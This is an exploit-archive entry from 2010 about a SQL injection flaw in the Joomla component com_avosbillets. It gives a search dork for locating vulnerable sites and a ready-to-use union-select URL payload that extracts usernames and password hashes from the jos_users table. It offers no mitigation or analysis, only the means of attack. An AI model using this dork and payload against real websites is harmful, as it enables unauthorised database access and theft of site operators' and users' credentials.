[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla (com_avosbillets) SQL injection Vulnerability
# Published : 2010-01-22
# Author : Snakespc
# Previous Title : Joomla Component com_gameserver SQL Injection Vulnerability
# Next Title : KosmosBlog v0.9.3 (SQLi/XSS/CSRF) Multiple Vulnerabilities


#--------------------------------------------------------
#Joomla (com_avosbillets) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com 
#site:anti-sec.info/vb/index.php      
#-------------------------------------------------------
#Dork:inurl"com_avosbillets"
#Exploit:
#--------
#PoC:
#http://server/index.php?option=com_avosbillets&task=view&view=event&id=-463+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
----------------------------------------------------------